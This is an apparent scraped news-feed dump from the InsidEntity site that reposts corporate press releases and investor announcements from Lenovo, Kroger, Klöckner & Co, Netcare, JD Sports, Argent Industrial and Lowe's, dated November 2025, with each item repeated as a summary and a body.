The post Lenovo Group: Second Quarter Financial Results 2025/26 appeared first on InsidEntity.

]]>
Imagery Source: Flickr Information Source: Lenovo Group Limited Lenovo Group Limited (HKSE: 992) (ADR: LNVGY), together with its subsidiaries (‘the Group’), today reported record results for the second quarter of fiscal year 2025/26, with overall group revenue reaching an all-time high of US$20.5 billion, up 15% year-on-year. Adjusted net income[1] grew 25% year-on-year to US$512 million, and adjusted net income margin expanded to 2.5%, driven by higher revenues. Together, these reflect the strength of the Group’s operational performance as they exclude the impact of non-cash fair value loss on warrants, notional interest on convertible bonds, and other non-cash items. The Group delivered double-digit year-on-year revenue growth across all main business groups and sales geographies. The AI-related revenue mix increased by 13 percentage points year-on-year, accounting for 30% of the Group’s total revenue this quarter. The growth was driven by high-double-digit revenue growth in AI Servers and triple-digit revenue growth in AI PCs, AI smartphones, and AI Services. These results are a testament to the Group’s clear strategy, operational excellence, and relentless innovation, reflecting not only the strength of its business today but also the resilience of its unique ‘Global/Local’ model and the vision of a company built to lead in the AI era. With the initial wave of infrastructure build-out in the AI era, the trend is evolving toward a more human- and enterprise-centric phase, as large language models become commoditised and user priorities shift toward personalisation and private domain. This evolution is unlocking new opportunities across devices, hybrid infrastructure, and tailored solutions, and enabling the Group to expand its leadership in Personal AI and further deliver its value proposition in Enterprise AI. As the macroeconomic environment stabilises, Lenovo remains committed to executing its Hybrid AI strategy and investing in innovation to deliver sustainable long-term returns to shareholders and make AI truly personalised. Lenovo’s Board of Directors declared an interim dividend of 8.50 HK cents per share. Chairman and CEO quote – Yuanqing Yang: “Capitalising on the AI democratization trend, and thanks to our clear strategy, operational excellence and relentless innovation, Lenovo delivered another quarter of record performance, while making important progress in both Personal AI and Enterprise AI. We will continue to leverage our unique Global/Local model to navigate uncertainties and capture the tremendous Hybrid AI opportunities, and in doing so, not only deliver sustainable long-term returns to our shareholders, but also make AI truly personalised for every individual and every enterprise.” For the full document, click the link below Lenovo Group Limited Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.

The post Lenovo Group: Second Quarter Financial Results 2025/26 appeared first on InsidEntity.

]]>
Kroger: Announces Third Quarter Conference Call with Investors https://ie3.euptest.org/kroger-announces-third-quarter-conference-call-with-investors/ Fri, 21 Nov 2025 10:42:03 +0000 https://www.insidentity.com/?p=147029 Imagery Source: Flickr Information Source: Nasdaq The Kroger Co. (NYSE: KR) announced today it will host its third quarter 2025 earnings conference call at 10:00 a.m. ET on Thursday, December 4, 2025. Kroger’s management team will comment on financial and operational results for the third quarter of 2025. The presentation will be broadcast online at ir.kroger.com. Click on “QuarterlyResults” to access the event. An on-demand replay of the webcast will be available at approximately 1:00 p.m. ET on Thursday, December 4, 2025. About Kroger At The Kroger Co. (NYSE: KR), we are, across our family of companies more than 400,000 associates who serve over 11 million customers daily through an eCommerce and store experience under a variety of banner names, serving America through food inspiration and uplift, and creating #ZeroHungerZeroWaste communities. To learn more about us, visit our newsroom and investor relations site. Kroger’s third quarter 2025 ended on November 8, 2025. For the full document, click the link below The Kroger Co Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.

The post Kroger: Announces Third Quarter Conference Call with Investors appeared first on InsidEntity.

]]>
Imagery Source: Flickr Information Source: Nasdaq The Kroger Co. (NYSE: KR) announced today it will host its third quarter 2025 earnings conference call at 10:00 a.m. ET on Thursday, December 4, 2025. Kroger’s management team will comment on financial and operational results for the third quarter of 2025. The presentation will be broadcast online at ir.kroger.com. Click on “QuarterlyResults” to access the event. An on-demand replay of the webcast will be available at approximately 1:00 p.m. ET on Thursday, December 4, 2025. About Kroger At The Kroger Co. (NYSE: KR), we are, across our family of companies more than 400,000 associates who serve over 11 million customers daily through an eCommerce and store experience under a variety of banner names, serving America through food inspiration and uplift, and creating #ZeroHungerZeroWaste communities. To learn more about us, visit our newsroom and investor relations site. Kroger’s third quarter 2025 ended on November 8, 2025. For the full document, click the link below The Kroger Co Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.

The post Kroger: Announces Third Quarter Conference Call with Investors appeared first on InsidEntity.

]]>
Klöckner and Co: Doubles Operating Income Before Material Special Effects in Third Quarter of 2025 and Continues Positive Trend https://ie3.euptest.org/klockner-and-co-doubles-operating-income-before-material-special-effects-in-third-quarter-of-2025-and-continues-positive-trend/ Fri, 21 Nov 2025 10:35:03 +0000 https://www.insidentity.com/?p=147023 Imagery Source: Wikimedia Commons / Raimond Spekking Information Source: Klöckner & Co Operating income (EBITDA) of €43 million before material special effects in the third quarter of 2025 is considerably above the prior-year level (Q3 2024: €21 million) Third-quarter shipments: 1.1 million metric tons, a slight increase of 1.9% compared to the prior-year quarter (Q3 2024: 1.1 million metric tons) At €1.6 billion, sales are slightly down by -2.2% compared to the prior-year quarter due to price factors (Q3 2024: €1.6 billion) Focus on higher value-added and service centre business, further strengthened with the sale of eight US distribution sites .EBITDA before material special effects is still expected to be between €170 million and €240 million for the full year 2025 In the third quarter of 2025, Klöckner & Co generated EBITDA of €43 million before material special effects, marking a considerable increase on the prior-year quarter (Q3 2024: €21 million) and thus continuing the positive trend from the first two quarters. In the first nine months of 2025, EBITDA before material special effects amounted to €150 million (9M 2024: €104 million). After negative special effects of €33 million, which mainly related to the sale of the Brazilian subsidiary (€20 million, €19 million of which consisted of exchange rate losses on deconsolidation) and to restructuring measures at the holding companies and in the Kloeckner Metals Europe segment, Klöckner & Co generated EBITDA of €117 million (9M 2024: €93 million). In the third quarter of 2025, the net loss from continuing operations improved to €13 million compared to a net loss of €29 million in the prior-year quarter. Including the material special effects above, the net loss from continuing operations amounted to €38 million in the first nine months of 2025 compared to a net loss of €55 million in the comparative period. Basic earnings per share, therefore, came to €-0.39, compared to €-0.55 in the prior-year comparative period. Including discontinued operations, the net loss for the first nine months came to €38 million in 2025 (9M 2024: €-84 million). Shipments came to 1.1 million metric tons in the third quarter of 2025, marking a slight increase of 1.9% compared to the prior-year quarter (Q3 2024: 1.1 million metric tons). In the first nine months, the Company raised shipments by 1.5% to 3.5 million metric tons (9M 2024: 3.4 million metric tons). The increases in shipments are mainly due to a continued positive trend in the Kloeckner Metals Americas segment. Despite the higher shipments, sales in the third quarter, at €1.6 billion, were slightly down by 2.2% compared to the prior-year level due to a lower average price level (Q3 2024: €1.6 billion). In the first nine months, sales fell slightly by 4.5% to €4.9 billion, likewise price driven (9M 2024: €5.1 billion). In the third quarter of 2025, Klöckner & Co’s cash flow from operating activities was €-118 million (Q3 2024: €-62 million). The cash outflow from investing activities in the third quarter of 2025 amounted to €23 million. This resulted in a free cash flow of €-141 million in the third quarter of 2025 (Q3 2024: €-94 million). The free cash flow in the first nine months of 2025 was €-237 million (9M 2024: €-120 million). The cash outflow in the reporting period was mainly driven by temporarily higher net working capital in the Kloeckner Metals Americas segment. “In a challenging market environment, we have once again shown that our strategy is working by doubling our operating income in the third quarter. We have continued the positive trend in the Kloeckner Metals Americas segment, and our sharpened focus on higher value-added and service centre business will continue to permanently strengthen our earnings profile. The sale of eight US distribution sites is another key step in the targeted reallocation of capital to higher-margin areas.” Guido Kerkhoff, CEO Klöckner & Co SE Focus on higher value-added and service centre business, further strengthened in North America and Europe As part of the corporate strategy, “Klöckner & Co: Leveraging Strengths – Step Up 2030,” the company has further strengthened its focus on the higher value-added and service centre business. The sale of eight distribution sites of the US subsidiary Kloeckner Metals Corporation will further reduce dependence on volatile commodity markets. Excluding the eight distribution sites, the share of sales generated by the higher value-added and service centre business was 87% in the first nine months of 2025 and hence six percentage points higher than with those sites included. Additionally, the company has further expanded its capabilities as a technology partner in the defence and infrastructure sector in Germany. At the beginning of the year, Klöckner & Co’s German subsidiary acquired and successfully integrated Ambo-Stahl, a provider of high-quality processing services for the defence and infrastructure sector. Building on this acquisition, Klöckner & Co has expanded its service portfolio and obtained official certification in Kassel for processing armour materials in accordance with the technical supply conditions approval for the German Federal Armed Forces (Bundeswehr TL-Zulassung). The expansion of capabilities is a further step towards profiting more from increased defence expenditure across Europe. Outlook For fiscal year 2025, Klöckner & Co continues to expect EBITDA of €170 million to €240 million before material special effects. Furthermore, the company continues to expect a significantly positive cash flow from operating activities for fiscal year 2025. For the full document, click the link below Klöckner & Co Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.

The post Klöckner and Co: Doubles Operating Income Before Material Special Effects in Third Quarter of 2025 and Continues Positive Trend appeared first on InsidEntity.

]]>
Imagery Source: Wikimedia Commons / Raimond Spekking Information Source: Klöckner & Co
  • Operating income (EBITDA) of €43 million before material special effects in the third quarter of 2025 is considerably above the prior-year level (Q3 2024: €21 million)
  • Third-quarter shipments: 1.1 million metric tons, a slight increase of 1.9% compared to the prior-year quarter (Q3 2024: 1.1 million metric tons)
  • At €1.6 billion, sales are slightly down by -2.2% compared to the prior-year quarter due to price factors (Q3 2024: €1.6 billion)
  • Focus on higher value-added and service centre business, further strengthened with the sale of eight US distribution sites
  • .EBITDA before material special effects is still expected to be between €170 million and €240 million for the full year 2025
In the third quarter of 2025, Klöckner & Co generated EBITDA of €43 million before material special effects, marking a considerable increase on the prior-year quarter (Q3 2024: €21 million) and thus continuing the positive trend from the first two quarters. In the first nine months of 2025, EBITDA before material special effects amounted to €150 million (9M 2024: €104 million). After negative special effects of €33 million, which mainly related to the sale of the Brazilian subsidiary (€20 million, €19 million of which consisted of exchange rate losses on deconsolidation) and to restructuring measures at the holding companies and in the Kloeckner Metals Europe segment, Klöckner & Co generated EBITDA of €117 million (9M 2024: €93 million). In the third quarter of 2025, the net loss from continuing operations improved to €13 million compared to a net loss of €29 million in the prior-year quarter. Including the material special effects above, the net loss from continuing operations amounted to €38 million in the first nine months of 2025 compared to a net loss of €55 million in the comparative period. Basic earnings per share, therefore, came to €-0.39, compared to €-0.55 in the prior-year comparative period. Including discontinued operations, the net loss for the first nine months came to €38 million in 2025 (9M 2024: €-84 million). Shipments came to 1.1 million metric tons in the third quarter of 2025, marking a slight increase of 1.9% compared to the prior-year quarter (Q3 2024: 1.1 million metric tons). In the first nine months, the Company raised shipments by 1.5% to 3.5 million metric tons (9M 2024: 3.4 million metric tons). The increases in shipments are mainly due to a continued positive trend in the Kloeckner Metals Americas segment. Despite the higher shipments, sales in the third quarter, at €1.6 billion, were slightly down by 2.2% compared to the prior-year level due to a lower average price level (Q3 2024: €1.6 billion). In the first nine months, sales fell slightly by 4.5% to €4.9 billion, likewise price driven (9M 2024: €5.1 billion). In the third quarter of 2025, Klöckner & Co’s cash flow from operating activities was €-118 million (Q3 2024: €-62 million). The cash outflow from investing activities in the third quarter of 2025 amounted to €23 million. This resulted in a free cash flow of €-141 million in the third quarter of 2025 (Q3 2024: €-94 million). The free cash flow in the first nine months of 2025 was €-237 million (9M 2024: €-120 million). The cash outflow in the reporting period was mainly driven by temporarily higher net working capital in the Kloeckner Metals Americas segment. “In a challenging market environment, we have once again shown that our strategy is working by doubling our operating income in the third quarter. We have continued the positive trend in the Kloeckner Metals Americas segment, and our sharpened focus on higher value-added and service centre business will continue to permanently strengthen our earnings profile. The sale of eight US distribution sites is another key step in the targeted reallocation of capital to higher-margin areas.” Guido Kerkhoff, CEO Klöckner & Co SE Focus on higher value-added and service centre business, further strengthened in North America and Europe As part of the corporate strategy, “Klöckner & Co: Leveraging Strengths – Step Up 2030,” the company has further strengthened its focus on the higher value-added and service centre business. The sale of eight distribution sites of the US subsidiary Kloeckner Metals Corporation will further reduce dependence on volatile commodity markets. Excluding the eight distribution sites, the share of sales generated by the higher value-added and service centre business was 87% in the first nine months of 2025 and hence six percentage points higher than with those sites included. Additionally, the company has further expanded its capabilities as a technology partner in the defence and infrastructure sector in Germany. At the beginning of the year, Klöckner & Co’s German subsidiary acquired and successfully integrated Ambo-Stahl, a provider of high-quality processing services for the defence and infrastructure sector. Building on this acquisition, Klöckner & Co has expanded its service portfolio and obtained official certification in Kassel for processing armour materials in accordance with the technical supply conditions approval for the German Federal Armed Forces (Bundeswehr TL-Zulassung). The expansion of capabilities is a further step towards profiting more from increased defence expenditure across Europe. Outlook For fiscal year 2025, Klöckner & Co continues to expect EBITDA of €170 million to €240 million before material special effects. Furthermore, the company continues to expect a significantly positive cash flow from operating activities for fiscal year 2025. For the full document, click the link below Klöckner & Co Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.

The post Klöckner and Co: Doubles Operating Income Before Material Special Effects in Third Quarter of 2025 and Continues Positive Trend appeared first on InsidEntity.

]]>
Netcare: Trading Statement https://ie3.euptest.org/netcare-trading-statement/ Fri, 21 Nov 2025 10:28:54 +0000 https://www.insidentity.com/?p=147019 Imagery Source: Moneyweb Information Source: Share Net Netcare Limited In terms of paragraph 3.4(b) of the JSE Limited (“JSE”) Listings Requirements, a company is required to publish a trading statement as soon as it is satisfied that a reasonable degree of certainty exists that the financial results for the upcoming reporting period will differ by at least 20% from those of the previous corresponding reporting period. Earnings per share (“EPS”), headline earnings per share (“HEPS”) and adjusted HEPS As detailed in the voluntary trading update for the year ended 30 September 2025 (“FY 2025”) released on SENS on 30 September 2025, due to increased activity, sustained operational efficiencies, the realisation of digitisation benefits, reduced strategic and diesel costs, lower interest rates and the positive impact of the share buyback programme, EPS, HEPS and adjusted HEPS for FY 2025 are expected to increase against the prior year (“FY 2024”). Adjusted HEPS is a key measure of sustainable earnings from trading operations. The calculation of adjusted HEPS excludes non-trading and/or non-recurring items. The information provided in this trading statement has not been reviewed or reported on by Netcare’s external auditors. Netcare intends to release its audited Group results for FY 2025 on or about Monday, 24 November 2025. For the full document, click the link below Netcare Limited Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.

The post Netcare: Trading Statement appeared first on InsidEntity.

]]>
Imagery Source: Moneyweb Information Source: Share Net Netcare Limited In terms of paragraph 3.4(b) of the JSE Limited (“JSE”) Listings Requirements, a company is required to publish a trading statement as soon as it is satisfied that a reasonable degree of certainty exists that the financial results for the upcoming reporting period will differ by at least 20% from those of the previous corresponding reporting period. Earnings per share (“EPS”), headline earnings per share (“HEPS”) and adjusted HEPS As detailed in the voluntary trading update for the year ended 30 September 2025 (“FY 2025”) released on SENS on 30 September 2025, due to increased activity, sustained operational efficiencies, the realisation of digitisation benefits, reduced strategic and diesel costs, lower interest rates and the positive impact of the share buyback programme, EPS, HEPS and adjusted HEPS for FY 2025 are expected to increase against the prior year (“FY 2024”). Adjusted HEPS is a key measure of sustainable earnings from trading operations. The calculation of adjusted HEPS excludes non-trading and/or non-recurring items. The information provided in this trading statement has not been reviewed or reported on by Netcare’s external auditors. Netcare intends to release its audited Group results for FY 2025 on or about Monday, 24 November 2025. For the full document, click the link below Netcare Limited Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.

The post Netcare: Trading Statement appeared first on InsidEntity.

]]>
JD Sports Fashion Plc: Q3 2025/26 Trading Statement https://ie3.euptest.org/jd-sports-fashion-plc-q3-2025-26-trading-statement/ Fri, 21 Nov 2025 10:26:21 +0000 https://www.insidentity.com/?p=147017 Imagery Source: JD Sports Fashion PLC Information Source: JD Sports Fashion PLC Solid Q3 with continued focus on operating & financial discipline; mindful of weaker near-term consumer indicators Headlines: Total Q3 sales including acquisitions +8.1% at constant FX rates (9M YTD: +15.7%) Improved LFL sales trend for Q3 in North America (vs Q2: -2.1%); resilient LFL sales in Europe (vs Q2: -1.1%), and improved UK organic sales(2) trend (vs Q2: -4.5%) Solid performance in apparel reflecting strength of the product range; continued softness in footwear with positive momentum within ‘running’ offset by end-of-cycle for key product lines. Maintaining trading disciplines with controlled price investments, particularly in online trading. Q3 gross margin 30bps lower YoY excluding acquisitions (40bps lower YoY overall) Continuing to deliver against strategic objectives; successfully launched automation at Heerlen distribution centre for JD Europe store replenishment, and initiated roll-out of new e-commerce platform in Europe (now live in Italy) following successful roll-outs in North America and APAC earlier this year. Costs and cash are being well controlled, with US integration synergies starting to flow through as guided. Mindful of incrementally weaker macro and consumer indicators in recent weeks, we are taking a pragmatic approach to the FY26 outlook ahead of our peak trading period in Q4. Anticipate FY26 profit before tax and adjusting items (PBTAI) to be within the lower end of current market expectations(3,4) On track to generate strong free cash flow and complete £200m of share buybacks in FY26 Régis Schultz, CEO of JD Sports Fashion plc: “We continued to make good progress with our strategic objectives in the quarter, against what remains a tough market backdrop. Our multi-brand and cross-category approach, and agility in responding to changing customer trends, are helping us to offset known consumer and industry headwinds. We are also controlling our costs and cash well through our focus on operating and financial discipline. “North America delivered an improved like-for-like sales trend in Q3, alongside resilient trends in Europe. The UK had a better organic sales performance, supported by the continued success of our new flagship store at the Trafford Centre in Manchester. By category, our apparel range is resonating well with customers, providing us with an opportunity for growth in underserved key markets. In footwear, notwithstanding known end-of-cycle product headwinds, ‘running’ remains a key trend for our customers, and we have a strong product line-up in this area going into our busiest trading period. “We are leveraging the significant investments we’ve made in technology to upgrade our e-commerce platforms across the Group, which are starting to deliver measurable benefits and will serve as a key foundation for the next phase of our digital and omnichannel growth. We also continue to make strides in optimising the Group’s global supply chain. Leveraging state-of-the-art technologies, during the period we launched automation at our distribution centre in Heerlen, the Netherlands – a key milestone in our growth and profitability plans for Europe. “We are navigating a year of volatility in external factors with disciplined execution, reflected in a solid Q3. In the near term, as we enter an important trading period, we are mindful of recent weak macro and consumer indicators in our key markets. These lead us to take a pragmatic approach for our FY26 profit outturn. We remain confident in the overall positive trajectory for our industry and JD Group over the medium term, and this is well reflected in our commitment to enhanced shareholder returns.” Q3 Performance highlights: North America (37% of Q3 sales): LFL -1.7% and organic sales growth +3.0% Excluding Finish Line, North America LFL -0.2%; back-to-school trading in line with our expectations Continued softness in footwear, driven by key product lines being at the end-of-cycle. The ‘Running’ category is seeing good momentum. Solid performance in apparel, albeit a smaller proportion of our category mix in North America Strong online performance, supported by new e-commerce platforms, better online ranges, focused marketing, and controlled price investments, particularly on finishline.com Continuing to manage the conversion to JD of the Finish Line fascia, where market-driven promotional intensity remains higher than normal in the short term Europe (35% of Q3 sales): LFL -1.1% and organic sales growth +4.0% Continued good performance in our sporting goods businesses, with resilient performance in JD Good performance in apparel, supported by a stronger product offer. Softer footwear performance against tough comparatives, especially in end-of-cycle product lines and athletic footwear for women and juniors. Resilient customer demand in the ‘running’ category Strong online performance, supported by ongoing momentum in ‘ship-from-store’ sales and the controlled price investments made in the online offer earlier this year. Promising early results from JD Italy’s new e-commerce platform United Kingdom(2) (24% of Q3 sales): LFL -3.3% and organic sales growth -2.0% Improved sales trends vs Q2, against a tough consumer backdrop and unseasonably warmer weather in September (impacting apparel sales in the month and our Outdoors businesses) Continued softness in footwear, driven by end-of-cycle product lines and tough comparatives in athletic footwear for women. Despite the weather impact, solid performance in apparel, especially for women Online business (higher proportion of sales mix versus other regions) impacted by market-driven promotions due to short-term footwear cycle dynamics; resilient store LFL supported by good conversion despite lower footfall Group gross margin % MOVEMENT: Excluding acquisitions (Courir, acquired on 27 November 2024), gross margin % for the Group in Q3 was 30bps lower YoY (9M YTD: 40bps lower). As with the first half of the year, this was largely driven by controlled price investments in the online offer For the overall Group, gross margin % in Q3 was 40bps lower YoY (9M YTD: 60bps lower) Inventory levels continue to be managed effectively, and we are well set up for our peak trading period OUTLOOK AND GUIDANCE: Throughout this year, we have operated in our global markets amid macroeconomic volatility, strained consumer finances, and evolving brand product cycles. Against this backdrop, we have maintained our focus on delivering against our medium-term strategic priorities (as set out in our StrategyRead More »JD Sports Fashion Plc: Q3 2025/26 Trading Statement

The post JD Sports Fashion Plc: Q3 2025/26 Trading Statement appeared first on InsidEntity.

]]>
Imagery Source: JD Sports Fashion PLC Information Source: JD Sports Fashion PLC

Solid Q3 with continued focus on operating & financial discipline;
mindful of weaker near-term consumer indicators

Headlines:
  • Total Q3 sales including acquisitions +8.1% at constant FX rates (9M YTD: +15.7%)
  • Improved LFL sales trend for Q3 in North America (vs Q2: -2.1%); resilient LFL sales in Europe (vs Q2: -1.1%), and improved UK organic sales(2) trend (vs Q2: -4.5%)
  • Solid performance in apparel reflecting strength of the product range; continued softness in footwear with positive momentum within ‘running’ offset by end-of-cycle for key product lines.
  • Maintaining trading disciplines with controlled price investments, particularly in online trading. Q3 gross margin 30bps lower YoY excluding acquisitions (40bps lower YoY overall)
  • Continuing to deliver against strategic objectives; successfully launched automation at Heerlen distribution centre for JD Europe store replenishment, and initiated roll-out of new e-commerce platform in Europe (now live in Italy) following successful roll-outs in North America and APAC earlier this year.
  • Costs and cash are being well controlled, with US integration synergies starting to flow through as guided.
  • Mindful of incrementally weaker macro and consumer indicators in recent weeks, we are taking a pragmatic approach to the FY26 outlook ahead of our peak trading period in Q4. Anticipate FY26 profit before tax and adjusting items (PBTAI) to be within the lower end of current market expectations(3,4)
  • On track to generate strong free cash flow and complete £200m of share buybacks in FY26
Régis Schultz, CEO of JD Sports Fashion plc: “We continued to make good progress with our strategic objectives in the quarter, against what remains a tough market backdrop. Our multi-brand and cross-category approach, and agility in responding to changing customer trends, are helping us to offset known consumer and industry headwinds. We are also controlling our costs and cash well through our focus on operating and financial discipline. “North America delivered an improved like-for-like sales trend in Q3, alongside resilient trends in Europe. The UK had a better organic sales performance, supported by the continued success of our new flagship store at the Trafford Centre in Manchester. By category, our apparel range is resonating well with customers, providing us with an opportunity for growth in underserved key markets. In footwear, notwithstanding known end-of-cycle product headwinds, ‘running’ remains a key trend for our customers, and we have a strong product line-up in this area going into our busiest trading period. “We are leveraging the significant investments we’ve made in technology to upgrade our e-commerce platforms across the Group, which are starting to deliver measurable benefits and will serve as a key foundation for the next phase of our digital and omnichannel growth. We also continue to make strides in optimising the Group’s global supply chain. Leveraging state-of-the-art technologies, during the period we launched automation at our distribution centre in Heerlen, the Netherlands – a key milestone in our growth and profitability plans for Europe. “We are navigating a year of volatility in external factors with disciplined execution, reflected in a solid Q3. In the near term, as we enter an important trading period, we are mindful of recent weak macro and consumer indicators in our key markets. These lead us to take a pragmatic approach for our FY26 profit outturn. We remain confident in the overall positive trajectory for our industry and JD Group over the medium term, and this is well reflected in our commitment to enhanced shareholder returns.” Q3 Performance highlights: North America (37% of Q3 sales): LFL -1.7% and organic sales growth +3.0%
  • Excluding Finish Line, North America LFL -0.2%; back-to-school trading in line with our expectations
  • Continued softness in footwear, driven by key product lines being at the end-of-cycle. The ‘Running’ category is seeing good momentum. Solid performance in apparel, albeit a smaller proportion of our category mix in North America
  • Strong online performance, supported by new e-commerce platforms, better online ranges, focused marketing, and controlled price investments, particularly on finishline.com
  • Continuing to manage the conversion to JD of the Finish Line fascia, where market-driven promotional intensity remains higher than normal in the short term
Europe (35% of Q3 sales): LFL -1.1% and organic sales growth +4.0%
  • Continued good performance in our sporting goods businesses, with resilient performance in JD
  • Good performance in apparel, supported by a stronger product offer. Softer footwear performance against tough comparatives, especially in end-of-cycle product lines and athletic footwear for women and juniors. Resilient customer demand in the ‘running’ category
  • Strong online performance, supported by ongoing momentum in ‘ship-from-store’ sales and the controlled price investments made in the online offer earlier this year. Promising early results from JD Italy’s new e-commerce platform
United Kingdom(2) (24% of Q3 sales): LFL -3.3% and organic sales growth -2.0%
  • Improved sales trends vs Q2, against a tough consumer backdrop and unseasonably warmer weather in September (impacting apparel sales in the month and our Outdoors businesses)
  • Continued softness in footwear, driven by end-of-cycle product lines and tough comparatives in athletic footwear for women. Despite the weather impact, solid performance in apparel, especially for women
  • Online business (higher proportion of sales mix versus other regions) impacted by market-driven promotions due to short-term footwear cycle dynamics; resilient store LFL supported by good conversion despite lower footfall
Group gross margin % MOVEMENT:
  • Excluding acquisitions (Courir, acquired on 27 November 2024), gross margin % for the Group in Q3 was 30bps lower YoY (9M YTD: 40bps lower). As with the first half of the year, this was largely driven by controlled price investments in the online offer
  • For the overall Group, gross margin % in Q3 was 40bps lower YoY (9M YTD: 60bps lower)
  • Inventory levels continue to be managed effectively, and we are well set up for our peak trading period
OUTLOOK AND GUIDANCE: Throughout this year, we have operated in our global markets amid macroeconomic volatility, strained consumer finances, and evolving brand product cycles. Against this backdrop, we have maintained our focus on delivering against our medium-term strategic priorities (as set out in our Strategy Update on 9 April 2025) and maintaining strict operating and financial disciplines to optimise our profit and cash. We believe we are controlling what we can well, as evidenced in our Q3 headlines today. Turning to the near-term outlook, recent indicators have shown incrementally weaker macroeconomic and consumer external data points in our key markets. We are particularly mindful of the pressures on our core customer demographic, including rising unemployment levels, as well as near-term volatility around consumer sentiment. Accordingly, and noting the importance of our peak trading period in Q4, we anticipate FY26 profit before tax and adjusting items (PBTAI) to be within the lower end of current market expectations(3,4). For the full document, click the link below JD Sports Fashion PLC Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.

The post JD Sports Fashion Plc: Q3 2025/26 Trading Statement appeared first on InsidEntity.

]]>
Argent Industrial: Unaudited and Unreviewed Interim Consolidated Results and Dividend Declaration for the 6 Months Ended 30 September 2025 https://ie3.euptest.org/argent-industrial-unaudited-and-unreviewed-interim-consolidated-results-and-dividend-declaration-for-the-6-months-ended-30-september-2025/ Fri, 21 Nov 2025 10:18:01 +0000 https://www.insidentity.com/?p=147012 Imagery Source: Argent Industrial Limited Information Source: Share Net Argent Industrial Limited DIVIDEND DECLARATION The directors of the company have declared and approved an interim gross dividend of 67 cents per share for the six months ended 30 September 2025 from income reserves. The following dates will apply to the abovementioned interim dividend: Publication of declaration data: Thursday, 20 November 2025 Last day to trade cum dividend: Monday, 15 December 2025 Trading ex-dividend commences: Wednesday, 17 December 2025 Record date: Friday, 19 December 2025 Dividend payment date: Monday, 22 December 2025 Share certificates may not be dematerialised or re-materialised between Wednesday, 17 December 2025 and Friday, 19 December 2025, both days inclusive. In determining the dividends tax of 20% to be withheld in terms of the Income Tax Act (No 58 of 1962), those shareholders who are not exempt from the dividend tax will therefore receive a dividend of 53.6 cents per share net of dividend tax. The company has 53,852,476 ordinary shares in issue as at 20 November 2025, and its income tax reference number is 9096/002/71/3. Ordinary shareholders who hold dematerialised shares will have their accounts at their CSDP or broker credited/updated on Monday, 22 December 2025. SHORT FORM ANNOUNCEMENT This short-form announcement is the responsibility of the directors of the company. It contains only a summary of the information in the full announcement (“Full Announcement”) and does not contain full or complete details. The Full Announcement can be found at: https://senspdf.jse.co.za/documents/2025/JSE/ISSE/ART/INTERIMS.pdf. Any investment decisions by investors and/or shareholders should be based on consideration of the Full Announcement as a whole. Copies of the full announcement are available for viewing on the company’s website at: https://argent.co.za/wp-content/uploads/2025/11/Interim-Results-Sep-2025.pdf. For the full document, click the link below Argent Industrial Limited Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.

The post Argent Industrial: Unaudited and Unreviewed Interim Consolidated Results and Dividend Declaration for the 6 Months Ended 30 September 2025 appeared first on InsidEntity.

]]>
Imagery Source: Argent Industrial Limited Information Source: Share Net Argent Industrial Limited DIVIDEND DECLARATION The directors of the company have declared and approved an interim gross dividend of 67 cents per share for the six months ended 30 September 2025 from income reserves. The following dates will apply to the abovementioned interim dividend: Publication of declaration data: Thursday, 20 November 2025 Last day to trade cum dividend: Monday, 15 December 2025 Trading ex-dividend commences: Wednesday, 17 December 2025 Record date: Friday, 19 December 2025 Dividend payment date: Monday, 22 December 2025 Share certificates may not be dematerialised or re-materialised between Wednesday, 17 December 2025 and Friday, 19 December 2025, both days inclusive. In determining the dividends tax of 20% to be withheld in terms of the Income Tax Act (No 58 of 1962), those shareholders who are not exempt from the dividend tax will therefore receive a dividend of 53.6 cents per share net of dividend tax. The company has 53,852,476 ordinary shares in issue as at 20 November 2025, and its income tax reference number is 9096/002/71/3. Ordinary shareholders who hold dematerialised shares will have their accounts at their CSDP or broker credited/updated on Monday, 22 December 2025. SHORT FORM ANNOUNCEMENT This short-form announcement is the responsibility of the directors of the company. It contains only a summary of the information in the full announcement (“Full Announcement”) and does not contain full or complete details. The Full Announcement can be found at: https://senspdf.jse.co.za/documents/2025/JSE/ISSE/ART/INTERIMS.pdf. Any investment decisions by investors and/or shareholders should be based on consideration of the Full Announcement as a whole. Copies of the full announcement are available for viewing on the company’s website at: https://argent.co.za/wp-content/uploads/2025/11/Interim-Results-Sep-2025.pdf. For the full document, click the link below Argent Industrial Limited Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.

The post Argent Industrial: Unaudited and Unreviewed Interim Consolidated Results and Dividend Declaration for the 6 Months Ended 30 September 2025 appeared first on InsidEntity.

]]>
Lowe’s Companies, Inc: Declares Cash Dividend https://ie3.euptest.org/lowes-companies-inc-declares-cash-dividend-4/ Fri, 21 Nov 2025 10:14:21 +0000 https://www.insidentity.com/?p=147009 Imagery Source: Wikimedia Commons / Miosotis Jade Information Source: Lowe’s Companies, Inc The board of directors of Lowe’s Companies, Inc. (NYSE: LOW) has declared a quarterly cash dividend of one dollar and 20 cents ($1.20) per share, payable Feb. 4, 2026, to shareholders of record as of Jan. 21, 2026. About Lowe’s Lowe’s Companies, Inc. (NYSE: LOW) is a FORTUNE® 100 home improvement company serving approximately 16 million customer transactions a week, with total fiscal 2024 sales of more than $83 billion. Lowe’s employs approximately 300,000 associates and operates over 1,700 home improvement stores, 530 branches and 130 distribution centres. Based in Mooresville, N.C., Lowe’s supports the communities it serves through programs focused on creating safe, affordable housing, improving community spaces, helping to develop the next generation of skilled trade experts and providing disaster relief to communities in need. For more information, visit Lowes.com. For the full document, click the link below Lowe’s Companies, Inc Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.

The post Lowe’s Companies, Inc: Declares Cash Dividend appeared first on InsidEntity.

]]>
